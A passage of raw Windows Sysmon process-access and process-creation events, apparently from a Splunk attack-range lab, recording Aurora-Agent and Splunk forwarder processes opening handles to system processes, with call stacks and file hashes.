indows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E35D-63C7-0606-00000000AF02}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E35D-63C7-0606-00000000AF02}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000039995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.151{FE4C2B44-E35D-63C7-0606-00000000AF02}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EF05-00000000AF02}5628C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.5351_none_7f0b8fbe21ea4a21\TiWorker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EE05-00000000AF02}3480C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.732{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000040024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.731{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B240F67B0920A5615C547341BAEDC6B6,SHA256=1E73BD17E54164E231328351D5FB6242ECF1E79E42EADACBB39BFE0BBFF97918,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.726{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000015313Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.514{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015312Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.514{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015311Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.514{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015310Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.513{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program 